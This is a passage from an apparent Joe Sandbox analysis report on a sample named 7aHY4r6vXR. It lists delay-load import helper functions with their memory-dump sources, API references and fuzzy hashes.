                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8d7486c7bbd9d9f37b19420c38e357f3c68fee945c0138dd2664e9eac29698cf
                                                            • Instruction ID: 11d7a00adc135997a59bd6a9ff345cf77f83811460d13aecf9e7d6d955a08972
                                                            • Opcode Fuzzy Hash: 8d7486c7bbd9d9f37b19420c38e357f3c68fee945c0138dd2664e9eac29698cf
                                                            • Instruction Fuzzy Hash: F6B012E526D1C0BC314853071C42C3B018DC0C0B22F30427EF825C40C0FA80EC881432
                                                            Function 00BEE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 305d2553e004cac6e785b222bd56d276d478eaa3fac44a75e9535ce3dd1cdc0c
                                                            • Instruction ID: fd64ecfeb950a7ee13493b00b18842824f4f77a2f0e1e4622890f2ab35d29a95
                                                            • Opcode Fuzzy Hash: 305d2553e004cac6e785b222bd56d276d478eaa3fac44a75e9535ce3dd1cdc0c
                                                            • Instruction Fuzzy Hash: 19B012D536D0C0AC310852071C42C3B018DC0C1B21F30817EFC25C40C0FA40EC441432
                                                            Function 00BEE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a03891ac1f4524b071432d79cee05fc8e7ebd3d72f894ee1cc251f2537a77ff4
                                                            • Instruction ID: 37c0d1392734ed19fae858e3be3d4a83950712ff9de12481f20485c80b0ef530
                                                            • Opcode Fuzzy Hash: a03891ac1f4524b071432d79cee05fc8e7ebd3d72f894ee1cc251f2537a77ff4
                                                            • Instruction Fuzzy Hash: D2B012F12680C0BC731892061C42C37028CC0C0F10B30827EF824C50C0EA40CE045833
                                                            Function 00BEE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3b1750aa7f93ac272ef71b6575db545d3300f33fd9f2fc8fb93afbe16cdcb861
                                                            • Instruction ID: e446ff59030852611c5c7e8cd8b3b9c5e9fd28d6a66fa785f0684aa82669b852
                                                            • Opcode Fuzzy Hash: 3b1750aa7f93ac272ef71b6575db545d3300f33fd9f2fc8fb93afbe16cdcb861
                                                            • Instruction Fuzzy Hash: F7B012E126C0C07C721852071D42C77028CC0C0B10B30C27EF524C50C0EB418C4D5433
                                                            Function 00BEE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 135a5ebd10394bc00d6f017f8e5eda6020d68b921c99b5b62f11a01f27030d83
                                                            • Instruction ID: 87529eb463eda3a80769eb8978629411bd95e5d85aee849b680979252a7a1499
                                                            • Opcode Fuzzy Hash: 135a5ebd10394bc00d6f017f8e5eda6020d68b921c99b5b62f11a01f27030d83
                                                            • Instruction Fuzzy Hash: 61B012E126C0C0BC721892061C42C37028CC0C0B10B30C27EF824C50C0EB40CC0C5433
                                                            Function 00BEE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 54a60f14a438feb20431c8bc3c730978ed1ce08d382ebfa45302903a4cfc60f5
                                                            • Instruction ID: 4115c6f918707714ceb22807fd7b2bd8b8cb0a3f02f7d64571dba422dfa0ab13
                                                            • Opcode Fuzzy Hash: 54a60f14a438feb20431c8bc3c730978ed1ce08d382ebfa45302903a4cfc60f5
                                                            • Instruction Fuzzy Hash: A7B012C12681C07C714453565C87C3B01ECC0C0B11F30437EF424C10C0FA808C480431
                                                            Function 00BEE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5c49d47b58d6d5bd2b335caf662d6fcd822776ded7758601ce57b1483f37d99a
                                                            • Instruction ID: 0b3ce561de9136a4c71d86f2061f7c617a1119c14cb26a778f662bce0f214785
                                                            • Opcode Fuzzy Hash: 5c49d47b58d6d5bd2b335caf662d6fcd822776ded7758601ce57b1483f37d99a
                                                            • Instruction Fuzzy Hash: 20B012C12680C07C710453565D86C3B01ECC0C0B10F30437EF424C10C0FE418D491431
                                                            Function 00BEE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ab12f49cf4cff9d2e665049ce349f010704aac0550869083e3e6e39613809327
                                                            • Instruction ID: 14a66f308520ee849db0ff2bd2e8ce2d21fcc11d734d01f58aab8064a8e893d0
                                                            • Opcode Fuzzy Hash: ab12f49cf4cff9d2e665049ce349f010704aac0550869083e3e6e39613809327
                                                            • Instruction Fuzzy Hash: D9B012C12681C07D710453561C82C3B01DCC0C0B10F30437EF824C50C0FA408C080431
                                                            Function 00BEE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d41204b87f0da638637de022b0368b136c83fd17825ddbaa6da76cb4376dd2b6
                                                            • Instruction ID: 709ef50274e6aa4d38ae8d16fd76072fd6f69bd21ad2661da2d2a4dbe1bdc66f
                                                            • Opcode Fuzzy Hash: d41204b87f0da638637de022b0368b136c83fd17825ddbaa6da76cb4376dd2b6
                                                            • Instruction Fuzzy Hash: 56B012C12685C0BD7108520A1D52D3B01CCC4C1F10F30417EF824C40C0FE408C040431
                                                            Function 00BEE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: af9c9c567fc710a98181c203285b403d47227476ec94897c38fcc9078f4752d8
                                                            • Instruction ID: 76e4d007db9a0bb1de8ecb6df16c032f33397a1f63c171e27bf982963e6024cb
                                                            • Opcode Fuzzy Hash: af9c9c567fc710a98181c203285b403d47227476ec94897c38fcc9078f4752d8
                                                            • Instruction Fuzzy Hash: A5B012C12684C0BC7108520A1D52C3B05CCC4C1F10F30817EF824C40C0FE418C450431
                                                            Function 00BEE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 63d7e5e9884ed2ee2f20519c3d5a217e8733576e126e080cc10f1449958df96e
                                                            • Instruction ID: 6508268fee1d17fbe6ada4fcc4b68b94d10f585a1c40b237d1f9ce96e171776d
                                                            • Opcode Fuzzy Hash: 63d7e5e9884ed2ee2f20519c3d5a217e8733576e126e080cc10f1449958df96e
                                                            • Instruction Fuzzy Hash: A7B012D12684C0BC710812261D56C3B018CC4C1F10F30417EF470C04C1BA408D080831
                                                            Function 00BEE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: df6d16be29dce02547fc092d7e6a2104e714d2a529a4653cf28ec9b7a84acaea
                                                            • Instruction ID: 065cdbdc86660b5f61e904ac98a61cfe31283463301b49a0cda7531aa1fa635c
                                                            • Opcode Fuzzy Hash: df6d16be29dce02547fc092d7e6a2104e714d2a529a4653cf28ec9b7a84acaea
                                                            • Instruction Fuzzy Hash: DDB012C12685C0BC7208520A5C97C3B05CCC4C1F11F30437EF424C00C0FA408C480431
                                                            Function 00BEE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 71979e294ef0b8939c3a985b17e5098539e557eb6094a16e52c78c1b58ca17ec
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 71979e294ef0b8939c3a985b17e5098539e557eb6094a16e52c78c1b58ca17ec
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: eedb327ce2da66395844bfba4bb49ff865a3b6337a5a63fdf19cec1340010e67
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: eedb327ce2da66395844bfba4bb49ff865a3b6337a5a63fdf19cec1340010e67
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d8a806ec08b27635fc86ca88256ef8f8b19895b4b294e79d156b975eb55f8f93
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: d8a806ec08b27635fc86ca88256ef8f8b19895b4b294e79d156b975eb55f8f93
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
